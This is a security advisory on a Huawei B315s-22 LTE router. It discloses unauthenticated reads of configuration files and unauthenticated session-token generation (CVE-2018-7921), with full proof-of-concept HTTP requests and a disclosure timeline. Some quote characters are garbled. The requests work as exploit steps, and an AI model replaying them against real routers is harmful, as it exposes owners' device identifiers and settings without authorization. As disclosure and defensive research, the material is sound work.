Huawei B315s-22 Information Disclosure

`#Product Family: LTE  
#Model B315s a 22  
#Firmware version: 21.318.01.00.26  
#Author: Usman Saeed (usman [at] xc0re.net)  
  
1. Unauthenticated access to sensitive files:  
  
It was observed that the web application running on the router, allows unauthenticated access to sensitive files on the web server.  
  
POC:  
  
By sending a simple GET request without authentication cookie one can get see valid responses:  
  
Request:  
GET /config/deviceinformation/config.xml HTTP/1.1  
Host: <omitted>  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
DNT: 1  
Connection: close  
  
Response:  
  
HTTP/1.1 200 OK  
a|  
  
<?xml version=a1.0a3 encoding=aUTF-8a3?>  
<config>  
<devicename>1</devicename>  
<serialnumber>0</serialnumber>  
<imei>1</imei>  
<imsi>1</imsi>  
<iccid>0</iccid>  
<msisdn>1</msisdn>  
<hardwareversion>1</hardwareversion>  
<softwareversion>1</softwareversion>  
a|  
  
Other resources accessible are:  
  
/config/dialup/config.xml  
/config/global/config.xml  
/config/global/net-type.xml  
/config/lan/config.xml  
/config/pcassistant/config.xml  
/config/voice/config.xml  
/config/wifi/configure.xml  
## After discussion with Huawei, according to them as the consequence of this vulnerability is quite low thus they marked it as a non-vulnerability.  
2. Unauthenticated valid token generation [CVE-2018-7921]  
  
It was observed that an unauthenticated user can generate aSessionIDa and a__RequestVerificationTokena by simply sending an HTTP GET request to a/api/webserver/SesTokInfoa.  
  
These tokens, although might not give the user full access to the router but using these, one can access to several restricted resources on the router.  
  
POC:  
  
First, we send a GET request, as mentioned above.  
  
Request:  
GET /api/webserver/SesTokInfo HTTP/1.1  
Host: <omitted>  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
DNT: 1  
Connection: close  
Content-Length: 0  
  
Response:  
HTTP/1.1 200 OK  
a|  
  
<?xml version=a1.0a3 encoding=aUTF-8a3?>  
<response>  
<SesInfo>SessionID=<omitted></SesInfo>  
<TokInfo><omitted></TokInfo>  
</response>  
  
Now we use these tokens in one of our request where authentication is required:  
  
Request:  
GET /api/cradle/status-info HTTP/1.1  
Host: <omitted>  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
__RequestVerificationToken: <omitted>  
X-Requested-With: XMLHttpRequest  
Cookie: SessionID=<omitted>  
DNT: 1  
Connection: close  
  
Response:  
  
HTTP/1.1 200 OK  
a|  
  
<?xml version=a1.0a3 encoding=aUTF-8a3?>  
a|  
  
It is to note with an invalid, expired authentication session, the response is:  
  
Response:  
HTTP/1.1 200 OK  
a|  
  
<?xml version=a1.0a3 encoding=aUTF-8a3?>  
<error>  
<code>125002</code>  
<message></message>  
</error>  
  
[+] Responsible Disclosure:  
  
Vulnerabilities identified a 31/07/2018  
Reported to Huawei a 31/07/2018  
Huwaei patched the vulnerability and issued a CVE a 31/08/2018  
Public disclosure a 01/09/2018  
  
  
`